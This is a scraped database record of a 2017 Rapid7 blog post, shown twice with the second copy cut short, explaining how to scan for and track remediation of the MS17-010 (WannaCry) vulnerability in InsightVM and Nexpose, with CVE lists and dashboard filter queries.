"2017-05-16T14:48:48", "bulletin": {"published": "2017-05-16T14:27:53", "enchantments": {}, "id": "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 11, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:1fb0e960-c2df-479c-860b-c11c12f4819b] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. 
And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group for reporting and tagging; it will update itself whenever new assets are found with this vulnerability (and when they are fixed). 
To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66971/pastedImage_1.png\"><img class=\"jive-image image-14\" height=\"513\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66971/758-513/pastedImage_1.png\" style=\" width: 804.524px;\" width=\"758\"/></a></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; 
font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\"> </span>&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under the vulnerability filter, type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:1fb0e960-c2df-479c-860b-c11c12f4819b] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/16/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-16T14:27:53", "lastseen": "2017-05-16T14:48:48"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:bc62d177-a43a-4d62-b4f0-851708246874] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p 
dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. 
And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group for reporting and tagging; it will update itself whenever new assets are found with this vulnerability (and when they are fixed). 
To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; 
font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
